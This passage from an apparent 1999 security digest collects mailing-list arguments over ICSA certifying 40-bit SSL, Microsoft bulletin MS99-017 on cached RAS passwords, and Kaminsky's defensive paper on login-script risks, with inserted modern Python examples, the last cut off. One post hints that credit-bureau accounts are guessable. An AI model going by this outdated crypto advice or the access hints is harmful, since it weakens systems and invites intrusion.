patches and updates, privacy, and sensitive > information handling. Nearly all of the criteria elements are > driven by the customer's security and operational policy-- which is > derived from their business objectives and risk management approach. 
[snip] > In this context _is_ possible for a customer to mandate (via their > own policy) use of whatever levels of cryptography they view as being > appropriate to their business model and customer requirements. For > example, if a customer policy specifies 128-bit TLS, > client-certificates, and token-based auth-- they will be validated at > that level. And if validating the server's identity to the end-user, > or no-hassle compatibility with zillions of consumers' bargain-club-PC > 40-bit browsers is a goal-- a different policy might well result. [snip] ---------------------------------------------------------------------------- Date: Fri, 28 May 1999 11:09:08 +0100 From: Simon Liddington To: BUGTRAQ@netspace.org Subject: Re: ICSA - Certified Sites and Criteria Issues Lucky Green writes: > Sure, a server can be specifically configured to not allow access by 40 bit > browsers, but the overwhelming majority of 128 bit capable websites support > both 128 and 40 bit crypto and will automatically use the highest strength > supported by the browser. No incompatibility issues are introduced by > enabling full-strength crypto. In my experience with Netscape and apache-SSL the lowest strength cipher (apart from no cipher at all) is used. Unless you disable the weaker ciphers in Netscape, netscape tries them first and will connect if the server allows them. Of course this doesn't invalidate your statement that there is no problem with enabling full-strength crypto, but it does mean there is also little to gain by doing so. 
Simon -- ----------------------------------------------------------------------- | Simon Liddington | | | E-Mail : sjl96v@ecs.soton.ac.uk | Tel (work) : +44 (0)1703 592422 | ----------------------------------------------------------------------- ---------------------------------------------------------------------------- Date: Fri, 28 May 1999 13:48:30 -0500 From: Jeremey Barrett To: BUGTRAQ@netspace.org Subject: Re: ICSA - Certified Sites and Criteria Issues On Fri, May 28, 1999 at 11:09:08AM +0100, Simon Liddington wrote: > Lucky Green writes: > > > Sure, a server can be specifically configured to not allow access by 40 bit > > browsers, but the overwhelming majority of 128 bit capable websites support > > both 128 and 40 bit crypto and will automatically use the highest strength > > supported by the browser. No incompatibility issues are introduced by > > enabling full-strength crypto. > > In my experience with Netscape and apache-SSL the lowest strength > cipher (apart from no cipher at all) is used. Unless you disable the > weaker ciphers in Netscape, netscape tries them first and will connect > if the server allows them. A client in SSL sends all its supported ciphers at once, it doesn't "try" some, then "try" others. The server chooses which cipher to use from amongst those the client supports. If you have 128-bit capable Netscape, and 128-bit capable Apache SSL, or a Netscape server, or Stronghold, or whatever, you get full strength crypto, unless there's a bug in the server. Obviously if one or the other doesn't support it, you don't. Regards, Jeremey. 
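The negotiation Liddington and Barrett argue about above can be made concrete. The following is an added example written for this digest, not code from any post in the thread and not the behaviour of any particular browser or server: it models a ClientHello carrying the client's full suite list and a server choosing one suite, either by its own preference order or by the client's. The suite names are those of RFC 2246; the client offers and server configurations are constructed for illustration.

```python
"""Model of SSL/TLS cipher-suite selection (added example, not from the thread).

The client offers every suite it supports in one ClientHello; the server picks
exactly one. Which one is chosen depends only on the server's selection policy,
so the client's ordering matters only if the server defers to it.
"""
from typing import List, Optional

# Symmetric key length, in bits, of each RFC 2246 suite used in the model.
KEY_BITS = {
    "TLS_RSA_EXPORT_WITH_RC4_40_MD5": 40,
    "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5": 40,
    "TLS_RSA_WITH_DES_CBC_SHA": 56,
    "TLS_RSA_WITH_RC4_128_MD5": 128,
    "TLS_RSA_WITH_3DES_EDE_CBC_SHA": 168,
}

# Constructed client offers, in the order the client lists them.
EXPORT_BROWSER = [                    # 40-bit-only "export" client
    "TLS_RSA_EXPORT_WITH_RC4_40_MD5",
    "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5",
]
FULL_BROWSER_WEAK_FIRST = [           # 128-bit capable, but lists 40-bit first
    "TLS_RSA_EXPORT_WITH_RC4_40_MD5",
    "TLS_RSA_WITH_RC4_128_MD5",
    "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
]

# Constructed server configurations, in the server's own preference order.
SERVER_ALL_SUITES = [
    "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
    "TLS_RSA_WITH_RC4_128_MD5",
    "TLS_RSA_WITH_DES_CBC_SHA",
    "TLS_RSA_EXPORT_WITH_RC4_40_MD5",
    "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5",
]
SERVER_STRONG_ONLY = SERVER_ALL_SUITES[:2]   # export and 56-bit suites disabled


def negotiate(client_offer: List[str], server_enabled: List[str],
              server_prefers_own_order: bool) -> Optional[str]:
    """Return the single suite the server selects, or None (no common suite).

    The client never 'tries' suites one after another: it sends the whole list
    and the server decides. The only variable is whose ordering wins.
    """
    first, second = ((server_enabled, client_offer) if server_prefers_own_order
                     else (client_offer, server_enabled))
    for suite in first:
        if suite in second:
            return suite
    return None


def negotiated_bits(client_offer: List[str], server_enabled: List[str],
                    server_prefers_own_order: bool) -> int:
    """Key length actually protecting the session (0 = handshake fails)."""
    suite = negotiate(client_offer, server_enabled, server_prefers_own_order)
    return KEY_BITS[suite] if suite else 0


def audit_server(server_enabled: List[str], minimum_bits: int = 128) -> List[str]:
    """Suites still enabled that SOME client could negotiate below the minimum.

    What a strong client gets is irrelevant here: as long as a weak suite is
    enabled, a weak client (or a server honouring client order) will use it.
    """
    return [s for s in server_enabled if KEY_BITS[s] < minimum_bits]


if __name__ == "__main__":
    cases = [
        ("full browser, weak first, server honours client order",
         FULL_BROWSER_WEAK_FIRST, SERVER_ALL_SUITES, False),
        ("full browser, weak first, server honours own order",
         FULL_BROWSER_WEAK_FIRST, SERVER_ALL_SUITES, True),
        ("export browser, server enables everything",
         EXPORT_BROWSER, SERVER_ALL_SUITES, True),
        ("export browser, server strong-only",
         EXPORT_BROWSER, SERVER_STRONG_ONLY, True),
    ]
    for label, client, server, own_order in cases:
        print(f"{label}: {negotiate(client, server, own_order)} "
              f"({negotiated_bits(client, server, own_order)} bits)")
    print("weak suites still enabled on the permissive server:",
          audit_server(SERVER_ALL_SUITES))
```

The model reconciles the two posts: with a server that defers to client order and leaves export suites enabled, a 128-bit browser listing 40-bit first lands on 40-bit (Liddington's experience); the same browser against a server that applies its own order gets the strongest shared suite (Barrett's point); and enabling 128-bit suites never locks out a 40-bit client (Green's point). Only removing the weak suites from the server configuration, which `audit_server` flags, changes what a 40-bit client can negotiate, at the cost of refusing it.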
-- Jeremey Barrett GPG fingerprint = 7BB2 E1F1 5559 3718 CE25 565A 8455 D60B 8FE8 B38F ---------------------------------------------------------------------------- Date: Fri, 28 May 1999 16:39:03 -0400 From: David Kennedy CISSP To: BUGTRAQ@netspace.org Subject: Re: ICSA - Certified Sites and Criteria Issues -----BEGIN PGP SIGNED MESSAGE----- I'm taking it upon myself to respond for Jon who's busy trying to have a life outside the office. As he did, I'm going to try to steer clear of a specific discussion of any of our customers. We thank the open review process of the total crypto community for bringing this to our attention. We will include this discussion in our ongoing process to maintain the TruSecure criteria. I'd like to restate what I feel is the most pertinent criterion that bears on this issue: the criterion requires encryption and protocols acceptable to both the host and the client. As a practical matter, for web activity this is either 40-bit SSL or 128-bit SSL. The TruSecure customers have the flexibility to choose, and their customers, in turn, decide if this is "acceptable." Clearly, most of the readers of these lists regard 128-bit SSL as the minimum they would find acceptable. However I think those same readers would acknowledge that the majority of users on the Internet worldwide today are using a 40-bit version of the popular browsers. A business has every right to decide if 40-bit SSL is the level of security they feel is appropriate for the information they are processing. A TruSecure customer may make a business decision that 40-bit SSL is "acceptable" for the communication of data from their hosts to their clients. Once this decision is made, they may configure their systems for 40-bit only. It should be clear from Jon's previous message that, in the abstract, 128-bit SSL is preferable to 40-bit SSL. 
However, 40-bit SSL for all its faults, protects data in transit from the client to the host from all but a targeted attack by an experienced, well-resourced adversary. 40-bit SSL provides superior security to the majority of meatspace exchanges of sensitive information.

At 07:53 PM 5/27/99 -0400, David Schwartz wrote:
>
> So does ICSA certification mean simply that a company has met its own
>requirements? (As opposed to some set of objectively validated or
>ICSA-imposed requirements?)

Certification requires compliance with our criteria. The best web page we have describing this is:

http://www.trusecure.net/process.html

If you want the nitty gritty details, browse to http://www.trusecure.net/ and either go to the library or click the "contact us" link.

ICSA helps customers address risks across multiple categories (physical, hacking, malicious code, spoofing, eavesdropping, lack of knowledge/awareness, lack of trust, DoS, privacy-user by site & data subject, lack of interoperability). We developed a methodology to focus on high risk/cost categories and follow this methodology with our customers.

When addressing the issue of privacy, ICSA approaches the matter by addressing the risk of capturing customer information across the wire and as it resides on the customer's server. We do require the use of encryption but choose to let the customer decide the level based on the assets they are protecting, the impact to their business, and the fact that the real concern is the data residing on the server un-encrypted. ICSA therefore works with our customers to set up multiple layers of synergistic controls that not only address the use of encryption but also those mentioned above.

We rely on addressing our customers' issues not only from a technology perspective, but from a business level one as well. When deploying security, ICSA will always address how technology impacts our customers' operations and costs.
At 07:31 PM 5/27/99 -0400, Adam Shostack wrote:
>Do you require certified sites post their security policy? If not,
>how do I know that the policy doesn't explicitly accept the presense
>of phf in /cgi-bin? Would it be possible to have that in my policy
>and still get certified, if I have good business reasons for putting
>it in place?
>

For the purposes of site certification we would not certify a site with phf in the cgi-bin directory. Our criteria do restrict this. However, we have customers who have purchased TruSecure but have "good business reasons" for ignoring or violating one or more of our criteria. ICSA has a process to review these occurrences and have withheld certification from some of these customers. Indeed, we have customers who are quite satisfied with their TruSecure purchase without achieving certification. Without turning into a sales/marketing droid, we try to emphasize TruSecure as a process to provide acceptable security to the customer; many customers are satisfied without completing certification and know this before their purchase.

>This flap may be a result of certifying compliance to policy, but the
>relying parties on your mark should not be expected to be able to read
>and understand those policies; they should be able to rely on your
>mark to say that the policies make sense. Incidentally, do you
>require sites to post these policies to which you certify compliance?
>

Certified sites must post a privacy and user data security policy as part of our criteria. We do not require the site to post their security policy. Most enterprises would be reluctant to post an un-sanitized version of their security policies which opens the question of how much sanitization is necessary or desirable. I don't believe it would be wise to require they post the nitty gritty details of their policies.
One would not want details such as these widely known: Inbound telnet is blocked except from IP xxx.xxx.xxx.xxx to yyy.yyy.yyy.yyy which is permitted so Y Inc can review progress reports on Project Z. Employees assigned to our office in Sri Lanka will use PPTP to host at zzz.zzz.zzz.zzz to access the company intranet. At 07:36 PM 5/27/99 -0400, Russ wrote: >However, the bottom line is that; > >- They are *NOT* employing "sophisticated encryption", they're employing >the least sophisticated deployable. > I can't respond to this directly. >- They also say ICSA "examined every aspect of our security >precautions", but in fact, you only examined those aspects defined in >their policies. For any customer, we examine every aspect defined by *our* criteria, which includes examining their security policies and implementations, but these two aspects are but a handful of the 200+ criteria we include in TruSecure. > >- They also claim that because of your certification, their customers >"know ConsumerInfo.Com's security measures are state-of-the-art" when in >fact their *NOT*. This issue is with the semantics on a page not maintained by ICSA. > >I will not, at this time, question the integrity of ICSA. Nor will I >suggest that ConsumerInfo.Com is out and out lying. > >I will, however, suggest that ICSA is tacitly allowing ConsumerInfo.Com >to mislead their customers via the ICSA Web Certification approval. By >ICSA not being permitted, by NDA, to discuss certification they have >performed, it renders, IMNSHO, the certification itself *worthless*. It >would appear that ConsumerInfo.Com has been allowed to say anything they >want about their work with ICSA and, by NDA, ICSA cannot rebuke it. > The way this paragraph is constructed makes it impossible to respond to it. We would like to respond, and explain how certification is not as you say, "worthless," but to do so would be to reveal confidential information about a customer. 
At 07:36 PM 5/27/99 -0400, Lucky Green wrote:
>
>Now I am really getting worried. From your post it is clear that you, a
>representative of ICSA, are unaware that by enabling 128 bit TLS/SSL on a
>server you by no means prevent users limited to 40 bit crypto from accessing
>it.
>

Incorrect, we understand this fact. Again, the criteria require encryption and protocols acceptable to both the host and the client. Popular browsers provide the capability for users to click on an icon and determine the encryption being used, if any. Undoubtedly that's how this thread started.

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.0.2

iQCVAwUBN07+V/GfiIQsciJtAQECrgQA3IsyfP6AEWV4OarIG5xs46sIWP/IdSYQ
sWvEYaENjbFdyu8tOH2hq5y1bm9/ALM8nITz94zYs/kZupJ2XZR5GYFhOpyfbG2v
4qzL1pml8Ht2aKsJ+r6Ghf9cp2qOfCejigSWcHTfRLNhgoI2u1CL6G6ua3OkDBS8
5KVOeNhwDK0=
=GqTy
-----END PGP SIGNATURE-----

Regards,

David Kennedy CISSP
Director of Research Services, ICSA Inc. http://www.icsa.net

Using encryption on the Internet is the equivalent of arranging an armored car to deliver credit-card information from someone living in a cardboard box to someone living on a park bench. Gene Spafford

----------------------------------------------------------------------------

Date: Fri, 28 May 1999 20:08:35 -0600 (MDT)
From: cult hero
To: InfoSec News
Subject: Re: [ISN] ICSA certifies weak crypto as secure

Reply From: edison

A few thoughts on the subject.

First, with the frightening amount of completely unsecured consumer info sites on (and off) the net today, I would disagree that ICSA's actions reflect "very badly" on our industry. Because there are much easier targets, consumerinfo.com can be reasonably certain that it won't even be attacked for quite some time. At least until most of the rest of the sites are secure in the same fashion. Don't get me wrong, I'm not advocating 40-bit encryption as 'secure,' but it is 'more secure' than nothing at all.
And until the ignorant IT managers with sites on the net clue in, this kind of certification won't _hurt_ our industry. Please don't attack me - I'm just saying that while we professionals might recognize weaknesses in this level of security, those outside don't and "we" still look good to them.

Second, if you've ever been to a hacker BBS/site, you have to know that getting into Equifax or any other reporting agency is pitifully easy. If you think 40-bit encryption is weak, how about a 2 character alphanumeric "password" on accounts that can be pulled from your own credit report? And for that matter, there are posted algorithms to the account scheme, so you can even generate your own. I will agree that there are more unsavory characters on the net than there are people aware of CBI dialups. But then again, 40-bit crypto is not exactly _easy_ to crack.

-edison

On Fri, 28 May 1999, cult hero wrote:

> I am becoming concerned about the apparent lack of professional competence
> within even well-known segments of the security community. I hope the
> incident I discovered is an isolated one, but even a single such incident
> is disquieting.

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]

@HWA

48.0 RAS and RRAS vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Thu, 27 May 1999 17:18:25 -0400
From: Russ
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Alert: Microsoft Security Bulletin (MS99-017) - RAS & RRAS Passwords

On March 20th, Dieter Goepferich [dieter.goepferich@bigfoot.com] discovered a vulnerability involving both RAS and RRAS. This was subsequently reported in Heise Online, a German publication;

http://www.heise.de/newsticker/data/cp-12.04.99-000/
http://www.heise.de/newsticker/data/hos-15.04.99-000/

Dieter originally reported it via some "product improvement suggestion" web form on www.microsoft.de back in March. Together we informed Microsoft Security (secure@microsoft.com) back in April.
By default the registry key is only accessible to Administrator and the user/owner of the passwords, but it represents a potential threat and a location of password information which would not otherwise be expected. See; http://www.microsoft.com/security/bulletins/ms99-017.asp for the complete write up including fix locations. There are two KB articles about this (one for RAS, and another for RRAS). They were not yet available at the time of writing. RAS http://support.microsoft.com/support/kb/articles/q230/6/81.asp RRAS http://support.microsoft.com/support/kb/articles/q233/3/03.asp Cheers, Russ - NTBugtraq Editor ------------------------------------------------------------------------------- Date: Thu, 27 May 1999 15:14:46 -0700 From: aleph1@UNDERGROUND.ORG To: BUGTRAQ@netspace.org Subject: Microsoft Security Bulletin (MS99-017) The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox. ******************************** Microsoft Security Bulletin (MS99-017) -------------------------------------- Patch Available for "RAS and RRAS Password" Vulnerability Originally Posted: May 27, 1999 Summary ======= Microsoft has released a patch that eliminates a vulnerability in the Microsoft (r) Windows NT (r) Remote Access Service (RAS) and Routing and Remote Access Service (RRAS) clients, in which a user's password is cached even if the user de-selects the "Save password" option. Issue ===== When the client software for Microsoft RAS or RRAS is used to dial into a server, a dialogue requests the user's userid and password for the server. On the same dialogue is a checkbox whose caption reads "Save password" and which is intended to provide the user with the option to cache their security credentials if desired. However, the implemented client functionality actually caches the user's credentials regardless of whether the checkbox is selected or de-selected. 
Cached security credentials, which include the password, are stored in the registry and protected by ACLs whose default values authorize only local administrators and the user to access them. Windows NT 4.0 Service Pack 4 also provides the ability to strongly encrypt the password data stored in the registry using the SYSKEY feature.

While there are no reports of customers being adversely affected by this vulnerability, Microsoft is proactively releasing a patch that restores correct functionality to the password caching function. The patch should be applied to all machines that are used as RAS or RRAS clients. It is important to note that RRAS servers also can be used as RRAS clients, and any machines used in such a capacity should have the patch applied as well.

Affected Software Versions
==========================
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0, Enterprise Edition

What Microsoft is Doing
=======================
Microsoft has released patches that fix the problem identified. The patches are available for download from the sites listed below in What Customers Should Do.

Microsoft also has sent this security bulletin to customers subscribing to the Microsoft Product Security Notification Service. See http://www.microsoft.com/security/services/bulletin.asp for more information about this free customer service.

Microsoft has published the following Knowledge Base (KB) article on this issue:
- Microsoft Knowledge Base (KB) article Q230681, RAS Credentials Saved when "Save Password" Option Unchecked, http://support.microsoft.com/support/kb/articles/q230/6/81.asp
- Microsoft Knowledge Base (KB) article Q233303, RRAS Credentials Saved when "Save Password" Option Unchecked, http://support.microsoft.com/support/kb/articles/q233/3/03.asp
(Note: It might take 24 hours from the original posting of this bulletin for the KB article to be visible in the Web-based Knowledge Base.)
What Customers Should Do
========================
Microsoft highly recommends that customers evaluate the degree of risk that this vulnerability poses to their systems and determine whether to download and install the patch. The patch can be found at:
- RAS:  ftp://ftp.microsoft.com/bussys/winnt/winnt-public
        /fixes/usa/nt40/Hotfixes-PostSP5/RASPassword-fix/
- RRAS: ftp://ftp.microsoft.com/bussys/winnt/winnt-public
        /fixes/usa/nt40/Hotfixes-PostSP5/RRASPassword-fix/

(Note: The URLs above have been wrapped for readability)

More Information
================
Please see the following references for more information related to this issue.
- Microsoft Security Bulletin MS99-017, Patch Available for "RAS and RRAS Password Caching" Vulnerability, (The Web-posted version of this bulletin), http://www.microsoft.com/security/bulletins/ms99-017.asp.
- Microsoft Knowledge Base (KB) article Q230681, RAS Credentials Saved when "Save Password" Option Unchecked, http://support.microsoft.com/support/kb/articles/q230/6/81.asp.
- Microsoft Knowledge Base (KB) article Q233303, RRAS Credentials Saved when "Save Password" Option Unchecked, http://support.microsoft.com/support/kb/articles/q233/3/03.asp

Obtaining Support on this Issue
===============================
If you require technical assistance with this issue, please contact Microsoft Technical Support. For information on contacting Microsoft Technical Support, please see http://support.microsoft.com/support/contact/default.asp.

Revisions
=========
- May 27, 1999: Bulletin Created.

For additional security-related information about Microsoft products, please visit http://www.microsoft.com/security

----------------------------------------------------------------------

THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.

(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.

*******************************************************************

You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like.

For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/bulletin.htm. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security.

-------------------------------------------------------------------------------

Date: Fri, 28 May 1999 07:59:35 -0400
From: Russ
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Alert: Microsoft Security Bulletin (MS99-017) - RAS & RRAS Passwords

Wow, talk about goofing up.

Eric Schultze correctly pointed out that he, together with Lisa O'Connor, Martin Dolphin, and Joe Greene reported this problem with RAS originally way back on March 19th, 1998 <-- (note, 1998, not 1999).

See the original message at;

http://ntbugtraq.ntadvice.com/default.asp?pid=36&sid=1&A2=ind9803&L=ntbu
gtraq&F=P&S=&P=4209

(URL is wrapped).

I, most inappropriately, credited another with the discovery in March of this year.
It's funny, when David LeBlanc first prompted me about this "discovery" this year, I could have sworn I'd seen it before but I failed to check my own archives...tsk tsk...;-]

So, to Lisa, Martin, Joe, and Eric, please accept my humble apologies!

To Microsoft, why the hell did it take a publication in a German magazine to provoke you to fix something that had been reported here a full year before?? Could it have been the fact that the 3/99 publication included an exploit tool? Maybe we need to have an exploit coding group at NTBugtraq that produces a tool for everything reported and distributes said tool to all and sunder?

Cheers,
Russ - NTBugtraq Editor

@HWA

49.0 Whitepaper: The Unforeseen Consequences of Login Scripts By Dan Kaminsky
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Seen via PacketStorm, scarfed from : http://doxpara.netpedia.net/login.html

Insecurity By Design: The Unforeseen Consequences of Login Scripts
By Dan Kaminsky

A common aspect of most client-server network designs is the login script. A set of commands executed upon provision of correct username and password, the login script provides the means for corporate system administrators to centrally manage their flock of clients. Unfortunately what's seemingly good for the business turns out to be a disastrous security hole in the University environment, where students logging into the network from their dorm rooms now find the network logging into them. This hole provides a single, uniform point of access to any number of previously uncompromised clients, and is a severe liability that must be dealt with with the highest urgency. Even those in the corporate environment should take note of their uncomfortable exposure and demand a number of security procedures described herein to protect their networks.
One possible solution for some may be the DoxPrint system designed by this author; it allows users to print to Novell Print Queues over the Network Neighborhood without requiring any Novell code on the client. Affected universities should consider switching to systems that do not require full logins, until more stable and secure systems are available.

What if I told you that every time you turned on your computer, the government could control exactly what would load? What if, every time you entered your username and password, your ISP gained the ability to specify exactly what software should load, what files to send, maybe even what data to erase? What if, merely by accessing a web page, your system came under the full control of the page's author, or more accurately any possible author of that page, authorized or not?

In each case, the security violation is quite obvious. Merely drawing electricity, connecting to the Internet, or accessing a web page does not constitute an open license to fully control a computer. In legal terms, each action by the user is an ongoing communication under contractual obligations--for example, the user agrees to pay a fee and provide authentication material in the form of username and password, and in return the ISP agrees to provide Internet access. Never does the user agree to a "remote root access contract"! Whether this access is, in fact, used or abused is irrelevant. None of the user's actions constitutes acceptance of "handing over the keys of the computer" to an external agent.

Of course, sometimes the issue of what, exactly, the term "user" means becomes muddled. In a corporate environment, the user of the computing environment is not necessarily its owner, nor is he or she the highest authority regarding what should or shouldn't run on the machine.
Login scripts, composed of lists of commands to be executed on the client machines upon the correct provision of username and password, provide a means for the central administrators of corporate computers to automatically connect to network drives and printers. They also allow the administrators to load any software they choose upon the client computers as if the user himself had run it. Anything from Censorware to remote control software is within the power of the administrator to load.

This freedom to centrally manage systems is extremely powerful. Some would argue that it's an intrinsic capability of any client-server architecture that claims to be "ready for the enterprise", as the prospect of physically handling each client machine is extraordinarily expensive in terms of funds and manpower. With every major client-server networking architecture automatically executing the commands contained within login scripts *by default*, it would appear that networking engineers are serving the perceived requirements of the corporate mentality quite well.

Small problem: University dorm networks aren't corporate.

The authentication procedures built into Windows NT Domains and Novell Netware are often used by Universities as a means for controlling access to file and print resources. Both the University and the student are in an advanced version of an Internet Service contract, but it's an ISP contract nonetheless. The user (student) agrees to pay a fee (tuition) and provide authentication material in the form of username and password, and in return the ISP (University) agrees to provide access to network resources. Unfortunately, to provide access to file and print resources, Windows (the predominant computing environment on the desktop) cannot generally delay the login procedure until the time of actual usage.
Indeed, just as in the corporate world, the system is presumed to be the property of the institution and the student/employee must thus authenticate him or herself upon startup of the machine. Also, just as in the corporate world, the system will by default execute any commands the system administrators have deemed appropriate.

The school does not own the hardware, nor does it own the operating system running upon it. Even if it did both, it would not own the data on those systems; students do not generally relinquish ownership of their own labor to their educational institution. It is of the highest inappropriateness, then, that University Information Technology departments receive full access to that which is plainly not theirs.

It's not their fault, really. They just want to track use and prevent abuse of pseudo-public resources. The only way to do this lies with the corporate authentication mechanisms within Netware and NT Domains. That the default setting in both environments is to load any login script provided is the fault of their respective designers, not of the accidental victims in IT. Ironically, not a bug but a long standing design decision is responsible for what is likely the greatest single computer security vulnerability at many universities.

Saying that Login Scripts--something which, for so long, has been considered as innocuous as an ugly background--are indeed such a powerfully damaging technology is a strong statement that needs to be backed up.

Login Scripts are so dangerous because they eliminate the most effective element of the security design behind Windows 95 and Windows 98: Security Through Impossibility. By default, Windows runs almost no services. You can't telnet in, you can't view the screen remotely, and there is no sendmail or ftp server with buffers to overflow. The only common service run is the infamous NetBIOS.
The result of this restrictive environment is interesting: While it's not particularly difficult to remotely crash a 95/98 machine, it's surprisingly hard to remotely compromise this erstwhile insecure operating system without at least some interaction from the user. It's the difference between a locked door and a brick wall.

Some arguably overzealous administrators will use this facet of security to ban any and all services not explicitly authorized (by an Act of God, usually). This can be excessive, and often prevents significant educational and productivity benefits. It's not that services are necessarily worrisome so much as the universal deployment of identically insecure services with significant value compromisable by unauthorized access--dedicated servers, unfortunately, have a tendency to fit very nicely into this category.

Sysadmins understand well that since both their servers are at risk and downtime is expensive, it is necessary to have recent backups of servers at all times. Sometimes, client desktops are also backed up. But, in an educational institution, it is grossly improper for the university to have copies of student/client data. Worse, as most computers ship with no system-scale tape backup, very few students are able to back up their data. This means that gigabytes of student data are protected only by the security built into their operating system.

This actually isn't too awful--no default remote access has its advantages--until the login scripts are compromised. Since the login scripts reside on servers that in general are never considered fully secure by nature of the services they run, and which are further targeted due to the high value gained by a successful penetration, we see the heretofore impossible compromisation of every single networked Windows station nearly simultaneously as being only a matter of changing a few commands in a login script.
Crack one server, and you crack a thousand clients whose only "crime" was stating their identity. That's one tough lesson.

Sadly, some university administrators have responded to this observed threat by claiming that 1) they'd never maliciously enter anything into the login scripts and 2) they're pretty much the only ones with access to the login scripts, so "nothing would ever happen." If there was ever a set of famous last words for a system administrator, these would be them. They've got the keys to systems they don't own, and it's probable that their users don't even know it. Their intentions are irrelevant; they're not generally the ones to worry about. As I told one admin, "It's not you I distrust. It's your computer. Maybe you'll accidentally share the wrong directory. Maybe you'll be forwarded to a web site that will use a backdoor to initiate a remote LANMAN authentication. Perhaps a 95/98 machine you logged into as Administrator for the domain will have its .PWL files cracked. Or maybe somebody will sneak in in the middle of the night and install a keylogger. With one hack providing access to *everybody*'s machine, it's worth it for a cracker to attack; isn't it worth it for you to defend?"

If this is making sysadmins in the corporate sector nervous...it should. Yes, the downside to centralized management is indeed single point of massive failure. More than ever, businesses are just one disgruntled system administrator away from a task-scheduled mass virus infection--or worse. While indeed there are methods for disabling the loading of login scripts, their all-or-nothing nature makes them unrealistic in many environments. Businesses should not need to choose between tremendous risk and necessary functionality. Microsoft and Novell need to implement the following functionality in their login script code:

1) Script Capabilities. Login scripts allow drives to be mounted, printers to be connected, applications to be loaded from remote drives, and so on.
System administrators need the ability to specify exactly which commands a client machine should honor. This provides a barrier to abuse--a site that only uses login scripts to mount network drives should be able to restrict clients to the degree of functionality the site requires. There are going to be issues, of course, with executable code on remote drives. To address this, we require...

2) Data Signatures. Cryptographic signatures on executable content, most commonly used by Microsoft's Authenticode system, provide a means for insecure systems to verify the appropriateness of remotely executed code. Sysadmins should be able to "sign" login scripts, as well as commonly executed remote code, and then specify that unless the client detects a signature from a "trusted" list, the content should be considered unauthorized. Sysadmins should also be able to sign actual executables (and maybe even data files) as acceptable for remote execution.

3) Executable hash checking. A slightly different tact might be to have clients cache hash values of specific files commonly run. Given a change from one session to another in the file hash, a trap could be sent to the administrator noting him or her that a system breach may have occurred. It's one thing to replace the contents of a file, but it's another to have to operate against the memory of every client that accessed the old file. This is a useful way to flip the disadvantage of large numbers of dumb machines into an advantage of intelligent agents with configurable responses to non-matching hashes.

Of course, the ultimate solution to this issue is to emulate an alternate login paradigm that Win95/98 implements to some degree. As Russ Cooper, editor of NTBugTraq, writes:

There is *no need* for a client machine (be it Win9x or NT) to log on to a domain in a way that would invoke a login script in order to gain access to its resources.
You log into the machine itself (the client machine), and then connect to the resource and supply a userID and password. This will establish the connection, without invoking the login script.

Bingo, problem solved, no? Novell and many other systems need to emulate this usage paradigm post-haste, and institutions still using full Domain logins must cease as soon as possible.

Universities should consider implementing systems that do not require any form of login procedure for the user to access his or her own computer. The reasoning for this is a matter of ownership--what right does a university have to deny a user access to his or her own computer? Password security is notoriously bad anyway, and is far too insecure for any degree of non-repudiability. I'm working on a solution for switched hubs involving using MAC Caches to allow trustable two-way communication traces.

Those who insist upon using login procedures need to disable them immediately for dorm-room computers. Students who need to connect to specific shares should be given a batch script to load--this will, incidentally, eliminate nasty situations where login scripts appropriate for one environment (say, the capturing of LPT1 to a printer port) are completely inappropriate in another (say, when that same user is in their dorm room).

For those administrators running Novell Netware all the way to your student's desktop, I implore you to evaluate DoxPrint. DoxPrint allows sysadmins to enjoy most of the advantages of running Netware servers on the backend while sparing Windows clients the hardship of installing and maintaining the Novell client code. All access occurs over the Network Neighborhood, and is quite flexible in its programmability and authentication. It's been tested and proven as a powerful solution to some of the problems Netware creates.

It's a strange thing, that such a common function would turn out so open for abuse.
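Proposal 3 above, executable hash checking, as an added example that is not part of Kaminsky's paper or of any Microsoft or Novell product: a client-side baseline of the hashes of the login script and the tools it runs, compared at the next session so that a changed file is reported rather than silently executed. The file names, contents and the directory layout are constructed for the demo; build_baseline, compare and demo are hypothetical names.

```python
import hashlib
import os
import tempfile


def fingerprint(data: bytes) -> str:
    """SHA-256 hex digest of a file's bytes: the value a client would cache."""
    return hashlib.sha256(data).hexdigest()


def build_baseline(root: str) -> dict:
    """Map every file under root (path relative to root, '/' separated)
    to its fingerprint."""
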